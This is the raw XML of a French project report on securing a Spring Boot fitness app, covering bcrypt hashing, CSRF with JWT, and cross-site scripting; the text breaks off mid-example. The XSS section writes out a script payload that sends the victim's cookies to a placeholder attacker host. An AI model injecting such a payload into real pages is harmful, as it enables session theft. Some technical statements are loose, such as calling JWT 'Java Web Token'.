        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">sécurité de l’application repose sur le module Spring Security de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SpringBoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui utilise JWT (Java Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) pour sécuriser les échanges REST entre le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>back-end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>front-end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et l’algorithme </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour le chiffrement des mots de passe en base de données. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DEE3A5" w14:textId="77777777" w:rsidR="00A74150" w:rsidRDefault="00A74150" w:rsidP="00A74150">
      <w:pPr>
        <w:pStyle w:val="paragrap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Une première source de vulnérabilité concerne les informations confidentielles stockées en base de données notamment les mots de passe. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pour crypter un mot de passe il existe des fonctions de hachage (MD5, SHA-1). Toutefois cette méthode est vulnérable aux attaques dites de collision aux attaques de type « </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rainbow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tables » qui sont des tables pré calculées de hash permettant de trouver le mot de passe initial. Afin d’apporter un niveau de sécurité supérieur lors du stockage des mots de passe dans la base de données, le salage, combiné aux fonctions de hash, est utilisé comme technique de chiffrement, il consiste en l’insertion de préfixes et suffixes à l’intérieur des mots de passe. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est une implémentation algorithmique utilisée par Spring Security pour le chiffrement des mots de passe en base de données : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3C7D55" w14:textId="0D488339" w:rsidR="00A74150" w:rsidRDefault="00A74150" w:rsidP="00A74150">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> les mots de passe sont cryptés sur une soixantaine de caractères,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}$2a$10$woFD.JoUP44f4iyS0YLywO5TLT4xabSvFZF9T4NEwhcGLmjGkKsOe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA0DB4E" w14:textId="77777777" w:rsidR="00A74150" w:rsidRDefault="00A74150" w:rsidP="00A74150">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:ind w:firstLine="705"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une seconde source de vulnérabilité concerne les applications web fonctionnant avec une authentification </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stateless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> notamment les applications SPA comme le projet Smart Fitness. Une authentification </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stateless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> signifie que les informations ayant permis à un utilisateur de s’authentifier ne sont pas conserver entre deux requêtes successives. Une des vulnérabilités des applications </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stateless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est le CRSF (Cross-Site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Forgery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="3C4858"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">« </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3C4858"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">falsification de requête inter-sites </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="3C4858"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">»). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le principe de cette faille consiste à envoyer un lien html à un utilisateur (par exemple dans un email) qui lorsque ce dernier cliquera dessus enverra par exemple une requête qui va supprimer la réservation d’une séance sur l’application Smart Fitness . Pour se prémunir ce genre d’attaque et sécuriser les échanges entre le client et le serveur, Spring Security utilise la bibliothèque JWT (JSON Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>). Le principe est l’échange d’un jeton signé permettant de vérifier la légitimité de la requête.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A3257B" w14:textId="77AA9565" w:rsidR="00A74150" w:rsidRDefault="00A74150" w:rsidP="00A74150">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:ind w:firstLine="705"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une troisième source de vulnérabilité sont les XSS. Le cross-site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est une faille de sécurité que l'on peut trouver sur les sites web. Le principe est d'injecter du code côté client (JavaScript) dans une page qui sera vue et dont le code JS sera exécuté par d'autres utilisateurs. Par exemple si un site propose l’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>upload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> d’image avec la possibilité de remplir un champ de description et qu’un utilisateur malintentionné remplisse le champ description de la manière suivante :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E1B7A6" w14:textId="66324278" w:rsidR="00A74150" w:rsidRPr="00A74150" w:rsidRDefault="00A74150" w:rsidP="00A74150">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A74150">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Une image" /&gt;&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A74150">
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A74150">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>="http://attaquant.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A74150">
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>get.php?v</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A74150">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">=" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A74150">
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A74150">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;&lt;/script&gt;&lt;p class="</w:t>
      </w:r>
      <w:r w:rsidRPr="00A74150">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A74150">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F3E95" w14:textId="77777777" w:rsidR="00A74150" w:rsidRDefault="00A74150" w:rsidP="00A74150">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:ind w:firstLine="705"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La page sur le serveur contenant l’image </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uplodé</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contiendra une description avec le code JS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0920CDD2" w14:textId="77777777" w:rsidR="00A74150" w:rsidRDefault="00A74150" w:rsidP="00A74150">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:ind w:firstLine="705"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>src=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="DD1144"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"./chat.jpg"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008080"/>
